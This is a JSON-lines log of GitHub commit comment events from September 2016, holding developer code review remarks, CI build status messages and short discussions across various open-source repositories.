{"id":"4609162008","type":"CommitCommentEvent","actor":{"login":"M66B"},"repo":{"name":"M66B/BackPackTrackII"},"payload":{"comment":{"id":19147926,"position":null,"line":null,"path":null,"commit_id":"c00c1bce9ecf430350aef2c81a9627b7b28ff419","created_at":"2016-09-23T15:16:28Z","updated_at":"2016-09-23T15:16:28Z","body":"There is really no need for an additional donation, but if you really want, you can find my (unchanged) bank details here: https://www.netguard.me/"}},"created_at":"2016-09-23T15:16:28Z"}
{"id":"4609163693","type":"CommitCommentEvent","actor":{"login":"klange"},"repo":{"name":"PoisonNinja/iris"},"payload":{"comment":{"id":19147932,"position":null,"line":null,"path":null,"commit_id":"f6acacb50d9ebfeb51f32414822128fb461edcf7","created_at":"2016-09-23T15:16:45Z","updated_at":"2016-09-23T15:16:45Z","body":"Huh... I never really liked that photo. I took it out of a hotel window, it came out too dark for a wallpaper, and the Eiffel Tower was completely obscured by another building."}},"created_at":"2016-09-23T15:16:45Z"}
{"id":"4609165223","type":"CommitCommentEvent","actor":{"login":"pawaitemadisoncollege"},"repo":{"name":"cordylus/ztools"},"payload":{"comment":{"id":19147938,"position":1,"line":1,"path":"src/test/java/com/bsmanning/ztools/test/UserDaoTest.java","commit_id":"06d030c476a59ebd0736d87a6015476a517a1852","created_at":"2016-09-23T15:17:02Z","updated_at":"2016-09-23T15:17:02Z","body":"Let me know if you need a second set of eyes on the @before/setup and @after/teardown."}},"created_at":"2016-09-23T15:17:02Z"}
{"id":"4609170108","type":"CommitCommentEvent","actor":{"login":"jpcsguru"},"repo":{"name":"magento/magento2"},"payload":{"comment":{"id":19147952,"position":null,"line":null,"path":null,"commit_id":"23103c03c527fe1ed3e1a3be691436818b7963fe","created_at":"2016-09-23T15:17:50Z","updated_at":"2016-09-23T15:17:50Z","body":"Its still the same in mag 2.1.1 its not fixed at all"}},"created_at":"2016-09-23T15:17:50Z"}
{"id":"4609173258","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19147959,"position":null,"line":null,"path":null,"commit_id":"a0861a7d6bbd9c2f43993e1b0f6ddba7d228f300","created_at":"2016-09-23T15:18:24Z","updated_at":"2016-09-23T15:18:24Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1152](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=14174&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **SUCCESS**\nSummary: Tests passed: 261, ignored: 3 Build time: 00:10:59"}},"created_at":"2016-09-23T15:18:24Z"}
{"id":"4609174031","type":"CommitCommentEvent","actor":{"login":"OskarStark"},"repo":{"name":"sonata-project/SonataMediaBundle"},"payload":{"comment":{"id":19147965,"position":null,"line":null,"path":null,"commit_id":"b7131f396ed6effe007368520418304c09c71815","created_at":"2016-09-23T15:18:32Z","updated_at":"2016-09-23T15:18:32Z","body":"@Soullivaneuh can you merge 3.x into master?"}},"created_at":"2016-09-23T15:18:32Z"}
{"id":"4609175507","type":"CommitCommentEvent","actor":{"login":"xyyx"},"repo":{"name":"nitrogen-project/android_vendor_nitrogen"},"payload":{"comment":{"id":19147975,"position":16,"line":64,"path":"products/common.mk","commit_id":"328937199101e42bd543403ec9e6391772bbb2ee","created_at":"2016-09-23T15:18:47Z","updated_at":"2016-09-23T15:18:47Z","body":"Hmm. What is wrong?l"}},"created_at":"2016-09-23T15:18:47Z"}
{"id":"4609178858","type":"CommitCommentEvent","actor":{"login":"an0n981"},"repo":{"name":"M66B/BackPackTrackII"},"payload":{"comment":{"id":19147984,"position":null,"line":null,"path":null,"commit_id":"c00c1bce9ecf430350aef2c81a9627b7b28ff419","created_at":"2016-09-23T15:19:22Z","updated_at":"2016-09-23T15:19:22Z","body":"Donations are never necessary, but with all the great things you have done for so many peoples' phones, you definitely deserve it"}},"created_at":"2016-09-23T15:19:22Z"}
{"id":"4609179127","type":"CommitCommentEvent","actor":{"login":"pawaitemadisoncollege"},"repo":{"name":"jpauley16/MTGStorage"},"payload":{"comment":{"id":19147986,"position":null,"line":null,"path":null,"commit_id":"29835fb110aefb8aade93766f073262fbbbac3c3","created_at":"2016-09-23T15:19:24Z","updated_at":"2016-09-23T15:19:24Z","body":"good to see that you got a start on hibernate. Let's get full CRUD here though and build out the tests. Currently you only have one method on the dao being tested. Again, it's a good start, just want to see this complete asap!"}},"created_at":"2016-09-23T15:19:24Z"}
{"id":"4609184287","type":"CommitCommentEvent","actor":{"login":"tawheeler"},"repo":{"name":"sisl/BayesNets.jl"},"payload":{"comment":{"id":19148005,"position":14,"line":53,"path":"src/io.jl","commit_id":"35fda5b5baffc58c48e015a4f311b770c75ec8ef","created_at":"2016-09-23T15:20:15Z","updated_at":"2016-09-23T15:20:15Z","body":"perfect, thank you.\r\nDidn't know you can link to specific lines like that."}},"created_at":"2016-09-23T15:20:15Z"}
{"id":"4609184608","type":"CommitCommentEvent","actor":{"login":"nikos-glikis"},"repo":{"name":"nikos-glikis/proxymity"},"payload":{"comment":{"id":19148006,"position":null,"line":null,"path":null,"commit_id":"f59210315c2a9aad11a461e51656fb870164269c","created_at":"2016-09-23T15:20:19Z","updated_at":"2016-09-23T15:20:19Z","body":"fixed #1 "}},"created_at":"2016-09-23T15:20:19Z"}
{"id":"4609184737","type":"CommitCommentEvent","actor":{"login":"fschutte"},"repo":{"name":"Cerios/cerioscoop-web"},"payload":{"comment":{"id":19148007,"position":1,"line":1,"path":"src/main/java/nl/cerios/cerioscoop/ValueObjects/ShowPresentationVO.java","commit_id":"4474b192ea84558aa430e3b7b093b4bd911048ba","created_at":"2016-09-23T15:20:20Z","updated_at":"2016-09-23T15:20:20Z","body":"Ron, please geen hoofdletters in package names."}},"created_at":"2016-09-23T15:20:20Z"}
{"id":"4609186086","type":"CommitCommentEvent","actor":{"login":"norbert-walter"},"repo":{"name":"schnello/volkszaehler.org"},"payload":{"comment":{"id":19148010,"position":null,"line":null,"path":null,"commit_id":"4543e3276cea01afb90a785f4c92abfeefc43ed3","created_at":"2016-09-23T15:20:34Z","updated_at":"2016-09-23T15:20:34Z","body":"@schnello\n\nich verstehe Deine �nderungen nicht ganz. Kann hiermit nichts anfangen:\n\n<<<<<<< HEAD\n=======\n>>>>>>> c0ce5bddffc8612cfe1cbe53f45eff1b409cbf33\n\nVielleicht liegts auch an SouceTree.\n\nNorbert\n\nZitat von schnello <notifications@github.com>:\n\n> @norbert-walter:\n> Bitte um review.\n> Folgende �nderungen wurden vorgenommen:\n> 1. API Key wird nu am Anfang validiert. (API friendly)\n> 2. tmp file ge�ndert in eine Variable\n> 3. if konstrukt ge�ndert in eine Schleife inkl Variablen Evaluierung\n>\n> Offene Baustelle:\n> Wie bekommt man die Usersettings am besten aus dem Script damit  \n> diese nicht immer bei einem \"git pull\" probleme machen. Laden via  \n> source aus dem home dir?\n>\n> --\n> You are receiving this because you were mentioned.\n> Reply to this email directly or view it on GitHub:\n> https://github.com/schnello/volkszaehler.org/commit/4543e3276cea01afb90a785f4c92abfeefc43ed3#commitcomment-19142526\n\n"}},"created_at":"2016-09-23T15:20:34Z"}
{"id":"4609186489","type":"CommitCommentEvent","actor":{"login":"klange"},"repo":{"name":"PoisonNinja/iris"},"payload":{"comment":{"id":19148013,"position":null,"line":null,"path":null,"commit_id":"d976679508688808c70fd3a9e6e4323530add377","created_at":"2016-09-23T15:20:38Z","updated_at":"2016-09-23T15:20:38Z","body":"You should probably update the \"History\" section."}},"created_at":"2016-09-23T15:20:38Z"}
{"id":"4609188076","type":"CommitCommentEvent","actor":{"login":"dzharkov"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":19148019,"position":20,"line":36,"path":"compiler/frontend/src/org/jetbrains/kotlin/resolve/ClassifierUsageChecker.kt","commit_id":"6a209a70aeb2316e02ee6ee18aa1f84b859901bc","created_at":"2016-09-23T15:20:54Z","updated_at":"2016-09-23T15:20:54Z","body":"I see, but it's still interesting for what reasons they weren't reported before and why there is no deprecation in the following example:\r\n```\r\n@Deprecated(\"\")\r\nclass D {\r\n    fun foo() {\r\n        this.hashCode() // no deprecation\r\n    }\r\n}\r\n```"}},"created_at":"2016-09-23T15:20:54Z"}
{"id":"4609198290","type":"CommitCommentEvent","actor":{"login":"pawaitemadisoncollege"},"repo":{"name":"bvue/servermonitor"},"payload":{"comment":{"id":19148038,"position":null,"line":null,"path":null,"commit_id":"a8a3ff1efc2de81f4a326a1dbd752792e599fb3d","created_at":"2016-09-23T15:22:39Z","updated_at":"2016-09-23T15:22:39Z","body":"Good work on the UserDao. UserDao testing needs some work yet."}},"created_at":"2016-09-23T15:22:39Z"}
{"id":"4609198676","type":"CommitCommentEvent","actor":{"login":"cneijenhuis"},"repo":{"name":"sphereio/commercetools-ios-sdk"},"payload":{"comment":{"id":19148040,"position":null,"line":null,"path":null,"commit_id":"f99683c6dc16539a3c3545cfdf70438dd3eb3d7c","created_at":"2016-09-23T15:22:43Z","updated_at":"2016-09-23T15:22:43Z","body":"🏆 "}},"created_at":"2016-09-23T15:22:43Z"}
{"id":"4609199413","type":"CommitCommentEvent","actor":{"login":"tcz001"},"repo":{"name":"twstrike/otrv4"},"payload":{"comment":{"id":19148041,"position":20,"line":239,"path":"otrv4.md","commit_id":"d188bf58842e839a856f9427f32c6fbbd7748648","created_at":"2016-09-23T15:22:52Z","updated_at":"2016-09-23T15:22:52Z","body":"Cool, changed"}},"created_at":"2016-09-23T15:22:52Z"}
{"id":"4609200848","type":"CommitCommentEvent","actor":{"login":"neobuddy89"},"repo":{"name":"nitrogen-project/android_vendor_nitrogen"},"payload":{"comment":{"id":19148045,"position":16,"line":64,"path":"products/common.mk","commit_id":"328937199101e42bd543403ec9e6391772bbb2ee","created_at":"2016-09-23T15:23:08Z","updated_at":"2016-09-23T15:23:08Z","body":"should be\r\nvendor/nitrogen/prebuilt/common/init.d/00banner:system/etc/init.d/00banner\r\ninstead of\r\nvendor/nitrogen/prebuilt/common/init.d/99SuperSUDaemon:system/etc/init.d/00banner"}},"created_at":"2016-09-23T15:23:08Z"}
{"id":"4609204747","type":"CommitCommentEvent","actor":{"login":"quintesse"},"repo":{"name":"ceylon/ceylon"},"payload":{"comment":{"id":19148064,"position":null,"line":null,"path":null,"commit_id":"7c07cb791f0ba28c172a6892314e03493dae3391","created_at":"2016-09-23T15:23:47Z","updated_at":"2016-09-23T15:23:47Z","body":"You guys could have said: \"hey compiler backend devs, there's a config option missing!\" ;)"}},"created_at":"2016-09-23T15:23:47Z"}
{"id":"4609204858","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19148067,"position":null,"line":null,"path":null,"commit_id":"47f765c611c33b277a621019e2825d10c59e54b2","created_at":"2016-09-23T15:23:49Z","updated_at":"2016-09-23T15:23:49Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1153](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=14185&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-23T15:23:49Z"}
{"id":"4609205474","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19148069,"position":null,"line":null,"path":null,"commit_id":"39f1b8df26f117e8cb74b3423212fedcfe54fb72","created_at":"2016-09-23T15:23:55Z","updated_at":"2016-09-23T15:23:55Z","body":"MoreDayliteFollowup (JasonGlazer) - x86_64-MacOS-10.9-clang: OK (2330 of 2337 tests passed, 24 test warnings)\n\n * 31 tests had: AUD diffs.\n * 15 tests had: Table small diffs.\n * 3 tests had: EIO diffs.\n * 3 tests had: ESO big diffs.\n * 3 tests had: RDD diffs.\n * 7 tests had: Table big diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-39f1b8df26f117e8cb74b3423212fedcfe54fb72-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-39f1b8df26f117e8cb74b3423212fedcfe54fb72-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.7%25-yellow.svg)</a> \n"}},"created_at":"2016-09-23T15:23:55Z"}
{"id":"4609207422","type":"CommitCommentEvent","actor":{"login":"ilya-g"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":19148075,"position":null,"line":null,"path":null,"commit_id":"29b19eea6895d61ad143224e4705c0d4c007e26d","created_at":"2016-09-23T15:24:15Z","updated_at":"2016-09-23T15:24:15Z","body":"KT-13582 platform agnostic way to compare arrays"}},"created_at":"2016-09-23T15:24:15Z"}
{"id":"4609208797","type":"CommitCommentEvent","actor":{"login":"zmb3"},"repo":{"name":"enaml-ops/pluginlib"},"payload":{"comment":{"id":19148079,"position":13,"line":45,"path":"product/types.go","commit_id":"2d571002ce62d4347cf2d57345e5077f7a860c08","created_at":"2016-09-23T15:24:30Z","updated_at":"2016-09-23T15:24:30Z","body":"Any way around this?  Can we make out own type that implements `error` and register it with gob?\r\n\r\nI'm 👎 on using a string for an error."}},"created_at":"2016-09-23T15:24:30Z"}
{"id":"4609212905","type":"CommitCommentEvent","actor":{"login":"xetra11"},"repo":{"name":"xetra11/led-spy"},"payload":{"comment":{"id":19148090,"position":null,"line":null,"path":null,"commit_id":"5d206b8ca014463e9644338b45785d765261973b","created_at":"2016-09-23T15:25:13Z","updated_at":"2016-09-23T15:25:13Z","body":"failed hard on commit naming convetion -> \"added\" :-1: "}},"created_at":"2016-09-23T15:25:13Z"}
{"id":"4609213018","type":"CommitCommentEvent","actor":{"login":"pieceofsummer"},"repo":{"name":"HangfireIO/Hangfire"},"payload":{"comment":{"id":19148091,"position":5,"line":244,"path":"src/Hangfire.Core/ContinuationsSupportAttribute.cs","commit_id":"5ee1ef8bc13dcff44f7077171288575fdf941fb8","created_at":"2016-09-23T15:25:14Z","updated_at":"2016-09-23T15:25:14Z","body":"Shouldn't it better be internal instead?"}},"created_at":"2016-09-23T15:25:14Z"}
{"id":"4609213146","type":"CommitCommentEvent","actor":{"login":"18PatZ"},"repo":{"name":"HarkerGameDevelopmentClub/TheGame1617"},"payload":{"comment":{"id":19148092,"position":null,"line":null,"path":null,"commit_id":"ce8ab6354ba01592f3e3545fd5b0b14d339193d9","created_at":"2016-09-23T15:25:16Z","updated_at":"2016-09-23T15:25:16Z","body":"Nope, that's Main"}},"created_at":"2016-09-23T15:25:16Z"}
{"id":"4609213870","type":"CommitCommentEvent","actor":{"login":"milmazz"},"repo":{"name":"elixir-lang/ex_doc"},"payload":{"comment":{"id":19148094,"position":5,"line":17,"path":"lib/mix/tasks/docs.ex","commit_id":"adfbbd1ef29d7bdba77bceef9a350a9f2eefc0bb","created_at":"2016-09-23T15:25:24Z","updated_at":"2016-09-23T15:25:24Z","body":"@josevalim I forgot to document this section with the new EPUB format. Good catch! :)"}},"created_at":"2016-09-23T15:25:24Z"}
{"id":"4609214433","type":"CommitCommentEvent","actor":{"login":"ptomin"},"repo":{"name":"uxmal/reko"},"payload":{"comment":{"id":19148095,"position":7,"line":48,"path":"subjects/PE-x86/VCExeSample/VCExeSample.c","commit_id":"a4a80c463872735f58ad1f189eaa48ee1674bc80","created_at":"2016-09-23T15:25:29Z","updated_at":"2016-09-23T15:25:29Z","body":"... unit test will be created soon\r\n"}},"created_at":"2016-09-23T15:25:29Z"}
{"id":"4609215938","type":"CommitCommentEvent","actor":{"login":"zmb3"},"repo":{"name":"enaml-ops/pluginlib"},"payload":{"comment":{"id":19148102,"position":10,"line":43,"path":"product/types.go","commit_id":"2d571002ce62d4347cf2d57345e5077f7a860c08","created_at":"2016-09-23T15:25:45Z","updated_at":"2016-09-23T15:25:45Z","body":"Is this the only way to do multiple return values over RPC?"}},"created_at":"2016-09-23T15:25:45Z"}
{"id":"4609216760","type":"CommitCommentEvent","actor":{"login":"rybakit"},"repo":{"name":"tarantool/doc"},"payload":{"comment":{"id":19148116,"position":21,"line":62,"path":"sphinx/book/connectors/__php.rst","commit_id":"def33e71cc369b05d806b15f6af86291b72c7332","created_at":"2016-09-23T15:25:55Z","updated_at":"2016-09-23T15:25:55Z","body":"> Eugene, please clarify your idea about different concepts. \r\n\r\nSure, please follow these links: \r\n* [Wrapper](https://en.wikipedia.org/wiki/Decorator_pattern)\r\n*  [Mapper](https://en.wikipedia.org/wiki/Data_mapper_pattern)\r\n\r\n> Which word would be more appropriate here?\r\n\r\nI think @nekufa can describe it better than me, as he is the author of this library."}},"created_at":"2016-09-23T15:25:55Z"}
{"id":"4609224788","type":"CommitCommentEvent","actor":{"login":"RileyDavidson"},"repo":{"name":"Peter-Wilson/Flock"},"payload":{"comment":{"id":19148159,"position":null,"line":null,"path":null,"commit_id":"04c77666f953cd0450f5d6e79908922ed361edfe","created_at":"2016-09-23T15:27:18Z","updated_at":"2016-09-23T15:27:18Z","body":"This fixed the issue where you'd take a picture then it would send you back to the login page instead of to the map?"}},"created_at":"2016-09-23T15:27:18Z"}
{"id":"4609227302","type":"CommitCommentEvent","actor":{"login":"caiusCitiriga"},"repo":{"name":"caiusCitiriga/gms"},"payload":{"comment":{"id":19148165,"position":null,"line":null,"path":null,"commit_id":"c49070fec840f9bfff95c0732c4c159ac7efe08e","created_at":"2016-09-23T15:27:44Z","updated_at":"2016-09-23T15:27:44Z","body":"This is the DTT not fatt_passiva"}},"created_at":"2016-09-23T15:27:44Z"}
{"id":"4609231161","type":"CommitCommentEvent","actor":{"login":"udalov"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":19148180,"position":20,"line":36,"path":"compiler/frontend/src/org/jetbrains/kotlin/resolve/ClassifierUsageChecker.kt","commit_id":"6a209a70aeb2316e02ee6ee18aa1f84b859901bc","created_at":"2016-09-23T15:28:24Z","updated_at":"2016-09-23T15:28:24Z","body":"I think it may have been more of an oversight, but to me not reporting it on `super` makes more sense. Super expression is not a proper kind of expression anyway.\r\n\r\nAlso I don't think anything should be reported in your example, because using a value of a deprecated type is fine (`Deprecated` is not \"poisonous\")."}},"created_at":"2016-09-23T15:28:24Z"}
{"id":"4609234010","type":"CommitCommentEvent","actor":{"login":"xchapter7x"},"repo":{"name":"enaml-ops/pluginlib"},"payload":{"comment":{"id":19148185,"position":10,"line":43,"path":"product/types.go","commit_id":"2d571002ce62d4347cf2d57345e5077f7a860c08","created_at":"2016-09-23T15:28:55Z","updated_at":"2016-09-23T15:28:55Z","body":"the word from the go core team was to pass strings over rpc and convert to\nan error.\n\n2016-09-23 11:25 GMT-04:00 Zac Bergquist <notifications@github.com>:\n\n> Is this the only way to do multiple return values over RPC?\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/enaml-ops/pluginlib/commit/2d571002ce62d4347cf2d57345e5077f7a860c08#commitcomment-19148102>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AAqI0-KL3K5VRxK7XooswnVTQJ6PePJQks5qs-95gaJpZM4KFGS6>\n> .\n>\n"}},"created_at":"2016-09-23T15:28:55Z"}
{"id":"4609239754","type":"CommitCommentEvent","actor":{"login":"xyyx"},"repo":{"name":"nitrogen-project/android_vendor_nitrogen"},"payload":{"comment":{"id":19148209,"position":16,"line":64,"path":"products/common.mk","commit_id":"328937199101e42bd543403ec9e6391772bbb2ee","created_at":"2016-09-23T15:29:57Z","updated_at":"2016-09-23T15:29:57Z","body":"Shit) I made many things today) I can make some mistakes)"}},"created_at":"2016-09-23T15:29:57Z"}
{"id":"4609240623","type":"CommitCommentEvent","actor":{"login":"XbimCI"},"repo":{"name":"xBimTeam/XbimGeometry"},"payload":{"comment":{"id":19148211,"position":null,"line":null,"path":null,"commit_id":"55ca362267b807103a39d7748851d0b89078ec9b","created_at":"2016-09-23T15:30:07Z","updated_at":"2016-09-23T15:30:07Z","body":"TeamCity Xbim :: Xbim Geometry :: XbimGeometry [Build 260](http://xbimbuilds.cloudapp.net/viewLog.html?buildId=1223&buildTypeId=Xbim_XbimGeometry_XbimGeometry) is now running\n"}},"created_at":"2016-09-23T15:30:07Z"}
{"id":"4609245411","type":"CommitCommentEvent","actor":{"login":"aciidb0mb3r"},"repo":{"name":"aciidb0mb3r/swift-package-manager"},"payload":{"comment":{"id":19148228,"position":13,"line":223,"path":"Sources/SourceControl/GitRepository.swift","commit_id":"65b87b1d046135630fcc481fd400ef8fce9b2643","created_at":"2016-09-23T15:30:54Z","updated_at":"2016-09-23T15:30:54Z","body":"😎 "}},"created_at":"2016-09-23T15:30:54Z"}
{"id":"4609249418","type":"CommitCommentEvent","actor":{"login":"ShawnieBoy"},"repo":{"name":"magarena/magarena"},"payload":{"comment":{"id":19148238,"position":null,"line":null,"path":null,"commit_id":"dd23352b116f620f5a51561f2f9540abffb6abde","created_at":"2016-09-23T15:31:37Z","updated_at":"2016-09-23T15:31:37Z","body":"I think it's just the terminology that Magarena uses runs counter to official rules. Playing lands with a spellcardevent, which is actually affecting enter the battlefield events. Would a separate method, named more clearly, be better in explaining what is occuring. As for me it's really confusing/misleading."}},"created_at":"2016-09-23T15:31:37Z"}
{"id":"4609249883","type":"CommitCommentEvent","actor":{"login":"dzharkov"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":19148242,"position":20,"line":36,"path":"compiler/frontend/src/org/jetbrains/kotlin/resolve/ClassifierUsageChecker.kt","commit_id":"6a209a70aeb2316e02ee6ee18aa1f84b859901bc","created_at":"2016-09-23T15:31:41Z","updated_at":"2016-09-23T15:31:41Z","body":"Ok"}},"created_at":"2016-09-23T15:31:41Z"}
{"id":"4609252139","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19148248,"position":null,"line":null,"path":null,"commit_id":"8674d72edf863314b1e80de3d3453cdafd2f1c7f","created_at":"2016-09-23T15:32:04Z","updated_at":"2016-09-23T15:32:04Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1154](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=14192&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-23T15:32:04Z"}
{"id":"4609254709","type":"CommitCommentEvent","actor":{"login":"pawaitemadisoncollege"},"repo":{"name":"paigeyahnke/memorate-web"},"payload":{"comment":{"id":19148252,"position":null,"line":null,"path":null,"commit_id":"ca5ada73ccf08161b436c585ca28a6ae3e68c5db","created_at":"2016-09-23T15:32:32Z","updated_at":"2016-09-23T15:32:32Z","body":"Good start on the dao and tests. It would be good to see full crud here soon!"}},"created_at":"2016-09-23T15:32:32Z"}
{"id":"4609258171","type":"CommitCommentEvent","actor":{"login":"jackregnart"},"repo":{"name":"finddx/cdx"},"payload":{"comment":{"id":19148260,"position":4,"line":11,"path":"cdx_core/spec/models/episode_spec.rb","commit_id":"0719ef80772358915018db37635767b4bc75015a","created_at":"2016-09-23T15:33:09Z","updated_at":"2016-09-23T15:33:09Z","body":"You should probably still test for this, but test the condition you added on the validation specifically."}},"created_at":"2016-09-23T15:33:09Z"}
{"id":"4609258195","type":"CommitCommentEvent","actor":{"login":"topsecretcoder"},"repo":{"name":"ValerasNarbutas/Hydrogen"},"payload":{"comment":{"id":19148261,"position":null,"line":null,"path":null,"commit_id":"6a20fed9cea4d960407e07477f53237c1e31466e","created_at":"2016-09-23T15:33:09Z","updated_at":"2016-09-23T15:33:09Z","body":"Hi,\r\n\r\nChallenge will close on the 03/10/2016, please raise your pull request to have your code evaluated.\r\n\r\nRegards,\r\nTopSecretCoder"}},"created_at":"2016-09-23T15:33:09Z"}
{"id":"4609260746","type":"CommitCommentEvent","actor":{"login":"Peter-Wilson"},"repo":{"name":"Peter-Wilson/Flock"},"payload":{"comment":{"id":19148267,"position":null,"line":null,"path":null,"commit_id":"04c77666f953cd0450f5d6e79908922ed361edfe","created_at":"2016-09-23T15:33:38Z","updated_at":"2016-09-23T15:33:38Z","body":"It fixes the issue for my phone where 100% of the time it would redirect to the map page but never have a userId. The issue was because it was redirecting to the mainActivity before it even received the results from the detect function. \r\nI delayed the call until after we get those results. Depending on how long that takes it may briefly show the login page while it's waiting. We may want to do something there to make it clear it is loading."}},"created_at":"2016-09-23T15:33:38Z"}
{"id":"4609261607","type":"CommitCommentEvent","actor":{"login":"andsel"},"repo":{"name":"andsel/moquette"},"payload":{"comment":{"id":19148268,"position":13,"line":96,"path":"broker/src/main/java/io/moquette/spi/IMessagesStore.java","commit_id":"4d637a349b78497243a51c7f312a8cd184588165","created_at":"2016-09-23T15:33:45Z","updated_at":"2016-09-23T15:33:45Z","body":"@windbender you are right,I'm going to stress test and probably I expect to\nview some issue on the counter. Good catch\nIl giorno 23/set/2016 16:50, \"windbender\" <notifications@github.com> ha\nscritto:\n\n> @andsel <https://github.com/andsel> should the ref count not be either an\n> AtomicInteger or via protected via \"synchronized\" ?\n>\n> —\n> You are receiving this because you were mentioned.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/andsel/moquette/commit/4d637a349b78497243a51c7f312a8cd184588165#commitcomment-19147416>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AA_Y0UrQ4SSgp3xUe4kGrhQ-CPkxzPy3ks5qs-dBgaJpZM4KFD__>\n> .\n>\n"}},"created_at":"2016-09-23T15:33:45Z"}
{"id":"4609262871","type":"CommitCommentEvent","actor":{"login":"topsecretcoder"},"repo":{"name":"venkat0904/Hydrogen"},"payload":{"comment":{"id":19148272,"position":null,"line":null,"path":null,"commit_id":"9c5bf236f53d4878623d41435296d9077406b9da","created_at":"2016-09-23T15:34:00Z","updated_at":"2016-09-23T15:34:00Z","body":"Hi,\r\n\r\nChallenge will close on the 03/10/2016, please raise your pull request to have your code evaluated.\r\n\r\nRegards,\r\nTopSecretCoder"}},"created_at":"2016-09-23T15:34:00Z"}
{"id":"4609266441","type":"CommitCommentEvent","actor":{"login":"SarahSauer"},"repo":{"name":"typearea/projectmanagement"},"payload":{"comment":{"id":19148276,"position":null,"line":null,"path":null,"commit_id":"7109d7409f168a3510ed89b71a1016ecdc3ac12d","created_at":"2016-09-23T15:34:35Z","updated_at":"2016-09-23T15:34:35Z","body":"Beim Impressum schließe ich mich an - ansonsten sehr schick geworden."}},"created_at":"2016-09-23T15:34:35Z"}
{"id":"4609266967","type":"CommitCommentEvent","actor":{"login":"topsecretcoder"},"repo":{"name":"venkat0904/Hydrogen"},"payload":{"comment":{"id":19148279,"position":null,"line":null,"path":null,"commit_id":"6a31596b7a7496902560608a1a682bdbc04607b3","created_at":"2016-09-23T15:34:41Z","updated_at":"2016-09-23T15:34:41Z","body":"Hi,\r\n\r\nChallenge will close on the 03/10/2016, please raise your pull request to have your code evaluated.\r\n\r\nRegards,\r\nTopSecretCoder"}},"created_at":"2016-09-23T15:34:41Z"}
{"id":"4609269753","type":"CommitCommentEvent","actor":{"login":"jcjmcclean"},"repo":{"name":"jcjmcclean/guides"},"payload":{"comment":{"id":19148287,"position":null,"line":null,"path":null,"commit_id":"398fb0a06bb61745ee2131a0513c26da1eba4a0e","created_at":"2016-09-23T15:35:10Z","updated_at":"2016-09-23T15:35:10Z","body":"Hey Noah,\n\nFirst time I've forked and edited someone else's project on github! It took\nme 3 separate branches and about 6 commits to figure out what I was doing.\nI ended up forking again from scratch once I'd worked it out. Hopefully the\npull request is ok :-)\n\nI left out the blurb started for now, just wanted to add in the quick\nsuggestions I had.\n\nCheers,\n\nJames\n\nOn Fri, Sep 23, 2016 at 3:39 PM, Noah Rodenbeek <notifications@github.com>\nwrote:\n\n> Can't wait for the PR, sir, thank you for the assist!\n>\n> —\n> You are receiving this because you are subscribed to this thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/jcjmcclean/guides/commit/398fb0a06bb61745ee2131a0513c26da1eba4a0e#commitcomment-19147232>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ABvPbjwUEC2OqTs0DuPlwrMOvmt4_Aegks5qs-SagaJpZM4KFDMY>\n> .\n>\n"}},"created_at":"2016-09-23T15:35:10Z"}
{"id":"4609271492","type":"CommitCommentEvent","actor":{"login":"topsecretcoder"},"repo":{"name":"mrekev/Hydrogen"},"payload":{"comment":{"id":19148292,"position":null,"line":null,"path":null,"commit_id":"6a31596b7a7496902560608a1a682bdbc04607b3","created_at":"2016-09-23T15:35:29Z","updated_at":"2016-09-23T15:35:29Z","body":"Hi,\r\n\r\nChallenge will close on the 03/10/2016, please raise your pull request to have your code evaluated.\r\n\r\nRegards,\r\nTopSecretCoder"}},"created_at":"2016-09-23T15:35:29Z"}
{"id":"4609272902","type":"CommitCommentEvent","actor":{"login":"topsecretcoder"},"repo":{"name":"vincnetas/Hydrogen"},"payload":{"comment":{"id":19148294,"position":null,"line":null,"path":null,"commit_id":"6a31596b7a7496902560608a1a682bdbc04607b3","created_at":"2016-09-23T15:35:43Z","updated_at":"2016-09-23T15:35:43Z","body":"Hi,\r\n\r\nChallenge will close on the 03/10/2016, please raise your pull request to have your code evaluated.\r\n\r\nRegards,\r\nTopSecretCoder"}},"created_at":"2016-09-23T15:35:43Z"}
